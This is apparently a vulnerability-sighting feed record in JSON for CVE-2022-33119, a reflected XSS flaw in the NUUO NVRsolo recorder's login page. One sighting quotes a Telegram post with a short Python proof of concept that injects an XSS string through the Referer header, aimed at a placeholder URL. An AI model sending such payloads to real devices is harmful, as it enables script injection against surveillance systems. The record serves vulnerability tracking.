{"vulnerability": "cve-2022-33119", "sightings": [{"uuid": "5fc34297-84dc-4fbe-9569-2fb86c73664f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-33119", "type": "seen", "source": "https://t.me/cibsecurity/44875", "content": "\u203c CVE-2022-33119 \u203c\n\nNUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-21T16:27:25.000000Z"}, {"uuid": "9b982fe8-7461-4c24-8639-b2bfbd14cff7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-33119", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/1746", "content": "This is a working XSS exploit on CVE-2022-33119\nhedars = {}\nxss_script = '\" >alert (\"XSS\") < \"'\nhedars['Referer'] = xss_script\nreq = requests.post (\"http://example.xss/login.php\", headers = hedars) # my test is on a certain software but since this is public article there is no working url here\nprint (req.text, req.cookies, req.headers)", "creation_timestamp": "2023-03-03T18:46:53.000000Z"}]}